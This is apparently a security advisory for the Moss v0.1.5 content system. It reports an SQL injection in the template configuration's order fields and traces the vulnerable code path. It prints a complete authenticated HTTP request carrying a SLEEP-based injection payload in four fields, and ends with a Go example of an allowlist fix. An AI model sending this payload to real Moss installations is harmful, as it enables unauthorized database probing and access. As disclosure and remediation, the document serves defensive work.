Description
Summary
Moss v0.1.5 has an SQL injection vulnerability: an attacker can place a crafted payload in the order parameter of the template configuration, and the payload is concatenated into a SQL statement that is executed by the database.
Injection point route:
/admin/api/config/template
Fields with injection vulnerabilities:
The order field of index_list, global_list, category_page_list and tag_cloud
Details
POST /admin/api/config/template HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
token: xxx
Content-Length: 818
Origin: http://10.4.58.197:6515
Connection: keep-alive
Cookie: xxx
{"head":"11","footer":"©2023 Powered by <a href=\"https://github.com/deep-project/moss\"><strong>Moss</strong></a>","robots_txt":"User-agent: *\nDisallow:","ads_txt":"","logo":"","favicon_ico":"","carousel":[],"enable_carousel":false,"menu":{"select":[1],"limit":40,"order":""},"index_list":{"limit":10,"order":"if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(4)))test))","category_ids":[1],"max_page":0,"disable_count":false},"global_list":{"limit":20,"order":"if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(4)))test))","category_ids":[1,2],"max_page":0,"disable_count":false},"category_page_list":{"limit":20,"order":"if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(4)))test))","category_ids":[1,2],"max_page":0,"disable_count":false},"tag_page_list":{"limit":20,"order":"","category_ids":null,"max_page":0,"disable_count":false},"tag_cloud":{"limit":15,"order":"if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(4)))test))","select":[]}}
The template configuration in the system backend has a sort option. If the sort statement is replaced with a malicious injection statement, it is concatenated into the query and executed when the template is loaded, which results in SQL injection.

First, update the template configuration and inject the SQL statement:

Then visit the homepage of the website again to trigger data loading and execute the SQL statement (the response is delayed by the SLEEP() calls in the payload):

Error-based injection also works; the resulting database error messages can be viewed in the log function of the system backend:
Code
The route that receives the POST request to /admin/api/config/template is as follows:

Following into the Controller.configupdate controller:

Following into the config.Config.Save() method:

Following into the service.Save() method: repository.save() stores the configuration in the database, and on success the Merge() method updates the current template configuration. No filtering or validation is applied to the configuration data anywhere in this path.

When the homepage is visited, the system renders the template, and the template file calls methods such as Widget.IndexList() and Widget.GlobalList() to load data.

The code of these two methods is shown below. Both call the simpleList() method. In simpleList(), the Order field is taken directly from the template configuration when the query context is generated, and the query is then executed through Article.ListByCategoryIds() or Article.List().

Following into the Article.List() method:

The vulnerability trigger point is in the file: \main\domain\core\repository\article.go
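The following is an added example, not code from the Moss repository, that contrasts the concatenation pattern described above with an allowlist-based fix. The column names (id, created_at, updated_at, views, title), the table name articles and the function names are assumptions for illustration; Moss's real schema and query builder are not shown on this page. The payload from the report is embedded as constructed sample input.

```go
package main

import (
	"fmt"
	"strings"
)

// allowedOrderColumns is a hypothetical allowlist of sortable article columns.
// The names are invented for this example; Moss's real schema is not shown.
var allowedOrderColumns = map[string]bool{
	"id": true, "created_at": true, "updated_at": true, "views": true, "title": true,
}

// reportPayload is the time-based payload from the report, kept as constructed input.
const reportPayload = "if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(4)))test))"

// vulnerableArticleQuery mirrors the pattern the report describes: the Order
// field from the template configuration is concatenated straight into the SQL.
func vulnerableArticleQuery(order string) string {
	return "SELECT * FROM articles ORDER BY " + order + " LIMIT 10"
}

// BuildOrderClause turns an untrusted "col [asc|desc], col [asc|desc]" string
// into an ORDER BY fragment that is safe to concatenate, or returns an error.
// Every column must be in the allowlist and every direction must be ASC or
// DESC, so expressions such as if(...) or subselects never reach the database.
func BuildOrderClause(order string) (string, error) {
	order = strings.TrimSpace(order)
	if order == "" {
		return "", nil // caller applies its default ordering
	}
	var parts []string
	for _, item := range strings.Split(order, ",") {
		fields := strings.Fields(item)
		if len(fields) == 0 || len(fields) > 2 {
			return "", fmt.Errorf("invalid order item %q", item)
		}
		col := strings.ToLower(fields[0])
		if !allowedOrderColumns[col] {
			return "", fmt.Errorf("column %q is not sortable", fields[0])
		}
		dir := "ASC"
		if len(fields) == 2 {
			switch strings.ToUpper(fields[1]) {
			case "ASC", "DESC":
				dir = strings.ToUpper(fields[1])
			default:
				return "", fmt.Errorf("invalid sort direction %q", fields[1])
			}
		}
		// Quote the identifier so the result is a column reference, never an expression.
		parts = append(parts, "`"+col+"` "+dir)
	}
	return strings.Join(parts, ", "), nil
}

// safeArticleQuery is the hardened counterpart: the order string is validated
// before it is placed in the statement, so a hostile value is rejected.
func safeArticleQuery(order string) (string, error) {
	clause, err := BuildOrderClause(order)
	if err != nil {
		return "", err
	}
	if clause == "" {
		clause = "`id` DESC"
	}
	return "SELECT * FROM articles ORDER BY " + clause + " LIMIT 10", nil
}

func main() {
	fmt.Println("vulnerable:", vulnerableArticleQuery(reportPayload))
	if _, err := safeArticleQuery(reportPayload); err != nil {
		fmt.Println("safe rejected payload:", err)
	}
	q, _ := safeArticleQuery("created_at desc, id")
	fmt.Println("safe accepted:", q)
}
```

The validation belongs at the point where the configuration is saved as well as where it is used, so that a value written by one code path cannot be trusted blindly by another; the same allowlist check applied in config.Config.Save() would have stopped the payload at the API boundary.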